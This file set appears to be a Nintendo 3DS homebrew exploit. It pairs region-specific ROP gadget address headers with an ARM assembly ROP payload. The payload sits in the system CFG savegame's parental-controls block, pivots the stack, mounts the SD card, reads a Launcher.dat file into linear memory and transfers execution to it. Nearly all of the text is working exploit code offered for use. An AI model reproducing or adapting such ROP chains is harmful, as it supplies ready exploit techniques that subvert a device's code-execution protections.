 4 | #define GSP_ForceLcdBlack 0x0012E120+4
 5 | #define GSPGPU_SERVHANDLEADR 0x0033afd0
 6 | 
 7 | #define STACK_PIVOT 0x001002d8 //: ldmib r6!, {r2, r4, r5, ip, sp, lr, pc} 
 8 | #define R6_SETUP 0x00182af0 //: ldr r6, [r5, #4] ; cmp r6, #0 ; beq #0x82a38 ; ldr r0, [r5] ; ldr r1, [r0, #4] ; mov r0, r5 ; blx r1
 9 | #define POP_R0127PC 0x001e5ffc+1 //: pop {r0, r1, r2, r7, pc}
10 | #define POP_R012347PC 0x001eac6e+1 //: pop {r0, r1, r2, r3, r4, r7, pc}
11 | #define ROP_POPPC 0x0010e5d8
12 | #define POP_R0PC 0x00157920
13 | #define POP_R1PC 0x00237190
14 | 
15 | #define BASE 0x00346a10 
16 | #define MNT 0x00321a36   // YS:
17 | #define PATH 0x0023a7d6  // YS:/Launcher.dat
18 | #define FILE BASE-0x400


--------------------------------------------------------------------------------
/rop_gadgets_usa.h:
--------------------------------------------------------------------------------
 1 | #define IFile_Open 0x0022bc6c+4
 2 | #define IFile_Read 0x0022bb58+4
 3 | #define FS_MountSdmc 0x00118bec+4
 4 | #define GSP_ForceLcdBlack 0x0012E120+4
 5 | #define GSPGPU_SERVHANDLEADR 0x0033afd0
 6 | 
 7 | #define STACK_PIVOT 0x001002d8 //: ldmib r6!, {r2, r4, r5, ip, sp, lr, pc}
 8 | #define R6_SETUP 0x00182af0 //: ldr r6, [r5, #4] ; cmp r6, #0 ; beq #0x82a38 ; ldr r0, [r5] ; ldr r1, [r0, #4] ; mov r0, r5 ; blx r1
 9 | #define POP_R0127PC 0x0017209c+1 //: pop {r0, r1, r2, r7, pc}
10 | #define POP_R012347PC 0x001eac92+1 //: pop {r0, r1, r2, r3, r4, r7, pc}
11 | #define ROP_POPPC 0x0010e5d8
12 | #define POP_R0PC 0x00157920
13 | #define POP_R1PC 0x002371dc
14 | 
15 | #define BASE 0x00346a10 
16 | #define MNT 0x00321a76   // YS:
17 | #define PATH 0x0023a822  // YS:/Launcher.dat
18 | #define FILE BASE-0x400


--------------------------------------------------------------------------------
/rop_gadgets_usa30.h:
--------------------------------------------------------------------------------
 1 | #define IFile_Open 0x0022bdec+4 //0x0022bc6c+4 180
 2 | #define IFile_Read 0x0022bcd8+4  //0x0022bb58+4 180
 3 | #define FS_MountSdmc 0x00118bec+4
 4 | #define GSP_ForceLcdBlack 0x0012E120+4
 5 | #define GSPGPU_SERVHANDLEADR 0x0033bfd0
 6 | 
 7 | #define STACK_PIVOT 0x001002d8 //: ldmib r6!, {r2, r4, r5, ip, sp, lr, pc}
 8 | #define R6_SETUP 0x001829f0 //: ldr r6, [r5, #4] ; cmp r6, #0 ; beq #0x82a38 ; ldr r0, [r5] ; ldr r1, [r0, #4] ; mov r0, r5 ; blx r1     -0x100
 9 | #define POP_R0127PC 0x0023c914+1 //: pop {r0, r1, r2, r7, pc}
10 | #define POP_R012347PC 0x001ead12+1 //: pop {r0, r1, r2, r3, r4, r7, pc}  0x80
11 | #define ROP_POPPC 0x0010e5d8
12 | #define POP_R0PC 0x00157920
13 | #define POP_R1PC 0x0023735c   //0x002371dc  180
14 | 
15 | #define BASE 0x00347a10 
16 | #define MNT 0x00322a76   // YS:
17 | #define PATH 0x0023a94e  // YS:/Launcher.dat
18 | #define FILE BASE-0x400


--------------------------------------------------------------------------------
/rop_payload.s:
--------------------------------------------------------------------------------
 1 | #include "rop_gadgets.h"
 2 | .arm
 3 | 	.text
 4 | 
 5 | #define ROPADDR 0x35040000  //linearmem dst for Launcher.dat - 0x38C40000 for new3ds, will be patched in at 3dsx installer runtime if needed
 6 | #define ROPSIZE 0x10110     //Launcher.dat size - cannot be smaller than this (this is the default *hax ropbin size)
 7 | #define GARBAGE 0x44444444
 8 | 
 9 | 	.global	_start  		// this payload is copied inside cfg savegame block 0xC0000, which is 3ds parental controls (size 0xC0)
10 | @---------------------------------------// the initial exploit handling starts at offset 0xA8 then pivots back here at offset 0 to finish loading Launcher.dat to linearmem, and then jumping to it
11 | _start:	
12 | 
13 | 	.word 0				// zeroed out so parental controls wont be activated
14 | 	.word POP_R0PC			// arg1 GSP_ForceLcdBlack
15 | 		.word GSPGPU_SERVHANDLEADR // (r0)
16 | 	.word GSP_ForceLcdBlack		//
17 | 		.word GARBAGE 		// (--) sp+=8 then pop r4,pc
18 | 		.word GARBAGE 		// (r1) - SetLcdForceBlacks arg1 (u8 boolean) due to it loading r1 from a stack pointer offset
19 | 		.word GARBAGE 		// (r4)
20 | 	.word POP_R0PC			// pop {r0 pc}
21 | 		.word MNT		// (r0) - mount address
22 | 	.word POP_R1PC			// pop {r1 pc}
23 | 		.word 0x9 		// (r1) - direct SDMC code          
24 | 	.word FS_MountSdmc		// FS_MountSdmc(): r0=mount_addr  r1=sd code 9
25 | 		.word GARBAGE		// (r4)
26 | 		.word GARBAGE		// (r5)
27 | 		.word GARBAGE		// (r6)
28 | 	.word POP_R0127PC		// pop {r0 r1 r2 r7 pc}
29 | 		.word FILE		// (r0) - _this
30 | 		.word PATH		// (r1) - path
31 | 		.word 0x00000001	// (r2) - openflags (read only)
32 | 		.word GARBAGE   	// (r5)
33 | 	.word IFile_Open		// IFile_Open(): r0=_this r1=UTF16 path r2=openflags ends with ldmfd sp! {r4-r8pc}
34 | 		.word GARBAGE		// (r4)
35 | 		.word GARBAGE		// (r5)
36 | 		.word GARBAGE		// (r6)
37 | 		.word GARBAGE		// (r7)
38 | 		.word GARBAGE		// (r8)
39 | 	.word POP_R012347PC		// ldmfd sp! {r0pc}
40 | 		.word FILE		// (r0) - _this
41 | 		.word FILE + 32		// (r1) - &writtenbytes
42 | 		.word ROPADDR		// (r2) - src
43 | 		.word ROPSIZE		// (r3) - size
44 | 		.word GARBAGE		// (r4)
45 | 		.word GARBAGE		// (r7)
46 | 	.word IFile_Read		// IFile_Read(_this &writtenbytes src size) ends with ldmfd sp! {r4-r9pc}
47 | 		.word GARBAGE		// (r4)
48 | 		.word GARBAGE		// (r5)
49 | 		.word . - 0x10		// (r6) base address for the upcoming stack pivot: ldmib r6!, {r2, r4, r5, ip, sp, lr, pc}
50 | 		.word ROPADDR		// (r7) sp ROPADDR is dst (Launcher.dat)
51 | 		.word GARBAGE		// (r8) lr (dont care)
52 | 		.word ROP_POPPC		// (r9) pc
53 | 	.word STACK_PIVOT		// pivot to sd rop payload Launcher.dat
54 | stage0_end: 
55 | 
56 | .fill	((_start + 0xA8 - stage0_end)/4),4, GARBAGE
57 | 
58 | 	.word BASE + 0xA8 + 0x4;  	//r6 setup ldr address
59 | 	.word BASE + 0xA8 - 0x8;  	//stack pivot register address (r6)
60 | 	.word STACK_PIVOT; 		//stack pivot
61 | 	.word BASE + 4; 		//sp
62 | 	.word R6_SETUP;  		//r6 setup for stack pivot
63 | 	.word ROP_POPPC;   		//pc


--------------------------------------------------------------------------------